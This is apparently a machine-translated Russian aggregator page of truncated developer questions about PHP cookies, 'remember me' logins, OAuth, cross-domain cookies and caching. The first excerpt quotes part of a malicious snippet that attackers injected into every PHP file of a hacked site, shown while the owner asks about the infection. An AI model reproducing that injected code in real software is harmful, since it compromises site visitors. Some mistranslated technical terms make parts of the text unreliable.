Наш сервер был взломан через некоторый метод SQL Injection (теперь исправлен). Все наши файлы PHP получили это добавление в самый верх каждого файла. global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); […]
Я довольно новичок в Laravel и задал вопрос о том, как меня помнить. Я успешно включил функцию «запомнить меня», добавив второй аргумент в метод Auth :: try. if (Auth::attempt(array('email' => $email, 'password' => $password), true)) { // The user is being remembered… } Как отмечено в документации, это позволяет запомнить меня неопределенно или до тех […]
Мне было интересно, какой самый безопасный способ входа в cookie? Если вы просто храните проход (зашифрованный солью) и имя пользователя в cookie и проверяете его против таблицы пользователя, потенциальный злоумышленник может украсть файл cookie и войти в систему. Обычно люди не проверяют «в последний раз онлайн». Так есть лучший способ для «помнить меня, печенье»? IP […]
Я использую CakePHP 2.4. У меня есть подпись OAuth на моем сайте. % 99,5 знаков успешно, но% 0,5 терпит неудачу. У меня эта ошибка в течение нескольких месяцев. Я пробовал много вещей для отладки и регистрации, но все же я не решил проблему. Хотя большинство запросов хороши, мне нужно решить небольшую часть. Сценарий выглядит следующим […]
Я хочу создать cookie из одного домена после регистрации пользователя на PHP. и сделать этот файл cookie доступным для 4 других доменов, а не для поддоменов. Я знаю, что файлы cookie не предназначены для доступа к другим доменам. Например, я установил переменную cookie $ user_email из домена www.firstdomain.com и хочу получить к ней доступ в […]
Я попытался найти руководство по php и интернету о том, как удалить файлы cookie, и я пробовал его точно так же, как они все говорят: setcookie("name", '', 1); или setcookie("name", '', time()-3600); Но когда я проверяю файлы cookie в диалоговом окне файлов cookie в Firefox, он все еще там с одинаковым значением. Я установил этот […]
Ну, я пытаюсь внедрить вход Steam OpenID на сайт, но я не совсем уверен, как это делается и как Steam проверяет пользователей, которые вошли в систему с OpenID. Что до сих пор, что я узнал, это то, что пар только возвращает идентификатор пользователя и ничего больше, поэтому для остальных вещей мне придется использовать API для […]
Сначала, пожалуйста, простите меня за полное отсутствие понимания лака. Это мой первый шаг – сделать что-нибудь с лаком. Я следую примеру: http://www.kalenyuk.com.ua/magento-performance-optimization-with-varnish-cache-47.html Однако, когда я устанавливаю и запускаю это, Varnish, похоже, не кэширует. Я получаю заголовок X-Varnish с одним номером и заголовком Via, который имеет значение 1.1 лак Мне сказали (моим провайдером), что из-за следующего […]
Я использую 2 переменные в cookie (7 дней), которые являются идентификатором пользователя и хешем. Хэш – это кодировка sha1 пользовательского агента и идентификатора пользователя. В этом случае какой-то хакер может войти в систему, который знает браузер украденного файла cookie. Каким образом я должен следовать или какая практика лучше всего помнить о проблемах безопасности?
Поэтому какой-то парень в какой-то другой компании подумал, что было бы здорово, если бы вместо использования мыла или xml-rpc или отдыха или любого другого разумного коммуникационного протокола он просто вложил весь свой ответ в виде файлов cookie в заголовке. Мне нужно вытащить эти файлы cookie, как мы надеемся, из этого кривого ответа. Если мне придется […]